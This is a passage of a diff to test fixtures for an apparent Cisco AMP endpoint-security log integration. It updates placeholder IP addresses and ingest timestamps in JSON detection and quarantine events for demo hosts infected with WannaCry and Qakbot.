"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -51,8 +51,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798648568Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "ingested": "2021-12-09T13:35:47.010643900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":96000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -74,7 +74,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -119,7 +119,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -129,8 +129,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798654363Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010647500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -150,7 +150,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -195,7 +195,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -205,8 +205,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798656876Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010651300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -226,7 +226,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -276,7 +276,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -293,8 +293,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798659144Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010654600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -316,7 +316,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -375,7 +375,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -392,8 +392,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798661450Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:47.010659500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -415,7 +415,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -478,7 +478,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -495,8 +495,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798663701Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:47.010664700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -518,7 +518,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -563,7 +563,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -573,8 +573,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798665972Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:47.010669200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -594,7 +594,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -635,7 +635,7 @@ "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -645,8 +645,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:10.798668225Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "ingested": "2021-12-09T13:35:47.010674600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine 